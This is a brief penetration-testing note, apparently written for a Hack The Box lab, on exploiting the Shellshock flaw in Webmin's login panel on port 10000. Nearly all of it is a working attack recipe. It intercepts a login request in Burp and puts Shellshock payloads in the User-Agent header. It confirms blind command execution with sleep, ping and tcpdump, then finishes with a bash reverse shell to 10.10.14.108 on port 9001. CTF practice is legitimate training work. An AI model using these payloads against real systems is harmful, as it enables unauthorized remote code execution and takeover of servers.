Port 10000 Webmin
Webmin uses CGI Files and is vulnerable to shellshock eg:- beep on HTB.
From Webmin login panel, initiate a login request and intercept it in burp. Forward it to the repeater.
Now change the user agent to shell shock and try following payloads.
() { :; };/bin/echo heloo
() { :; }; sleep 10 (did work some kind of blind shell shock)
Now check ping
() { :; };ping -c 1 10.10.14.108
on our machine
sudo tcpdump -i tun0 -v
And we get the ping. So lets try reverse shell.
sh -i >& /dev/tcp/10.10.14.108/9001 0>&1
Last updated